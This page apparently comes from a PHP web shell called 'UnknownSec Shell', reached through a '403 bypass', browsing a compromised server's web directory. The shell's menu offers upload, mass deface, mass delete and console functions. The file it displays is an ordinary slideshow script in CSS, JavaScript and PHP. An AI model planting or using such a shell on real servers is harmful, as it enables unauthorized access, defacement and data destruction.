shell bypass 403
UnknownSec Shell
:
/
var
/
www
/
html
/
views
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
v_slideshow.php
<style type="text/css"> #slideshowContainer { position: relative; float: left; width: 100%; height: auto; margin: 0px 0 30px 0; padding: 0; z-index: 1; border-top: solid 1px #412f8a; border-bottom: solid 2px #412f8a; } #slideshow { position: relative; border: none; } #slideshow div { position: absolute; top: 0; left: 0; border: none; } </style> <script language='javascript'> window.onload = function start(){ slide(); slideshowHeight(); } window.onresize = function start(){ slideshowHeight(); } function slide(){ var num = 0; var num1 ; var total = 1; var i; window.setInterval(function(){ for (j = 0; j <= total; j++){ //reset opacity and z-index of all divs document.getElementById(j).style.opacity= 1; document.getElementById(j).style.zIndex = 8; navDiv = "nav" + j; document.getElementById(navDiv).style.opacity = .7; } fadeIn(num,total); num = (num + 1) % (total + 1); // increase by num 1, reset to 0 at total num1.value = num; }, 20000); // repeat forever, polling every 20 seconds } function fadeIn(i,total) { var prevImg; var navDiv; navDiv = "nav" + i; if (i > 0){ prevImg = (i - 1); prevNav = "nav" + prevImg; } else { prevImg = total; prevNav = "nav" + total; } newImg = document.getElementById(i); newImg.style.opacity = 0; newImg.style.zIndex = 10; document.getElementById(prevImg).style.zIndex = 9; var op = 0.1; // initial opacity var timer = setInterval(function () { if (op >= 1){ clearInterval(timer); } if (op > .5){ document.getElementById(navDiv).style.opacity = 1; } newImg.style.opacity = op; newImg.style.filter = 'alpha(opacity=' + op * 100 + ")"; op += op * 0.1; }, 60); } function slideshowHeight(){ var w = window.innerWidth; var h = w * .54; document.getElementById('slideshowContainer').style.height = h + "px"; } </script> <?php $images_arr = array(0=>'Conquer-Admin.jpg', 1=>'Unlock-the-Secrets.jpg'); echo " <div id='slideshowContainer'> <div id='slideshow'>"; foreach ($images_arr as $key => $image){ echo " <div id='".$key."' style='z-index:8; opacity:1;'> <img src='views/images/" . $image."' width=100% border=0> </div>"; } echo " </div><!--ends slideshow--> <div id='navBar' style='display:none'>"; foreach ($images_arr as $key => $image){ echo " <a href='javascript::' onClick='slide(".$key.")'> <div id='nav".$key."' style='display: inline-block; opacity: .7'></div></a>"; } echo "</div><!--ends navBar--> </div><!--ends slideshowContainer-->"; ?>
© 2026 UnknownSec